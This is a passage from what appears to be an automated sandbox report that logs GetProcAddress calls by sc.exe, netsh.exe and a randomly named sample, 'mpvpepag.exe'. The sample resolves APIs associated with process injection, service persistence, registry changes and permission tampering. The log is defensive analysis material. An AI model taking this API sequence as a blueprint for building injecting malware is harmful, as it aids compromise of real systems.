(UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006040)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00004252)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004380)\n \"netsh.exe\" called 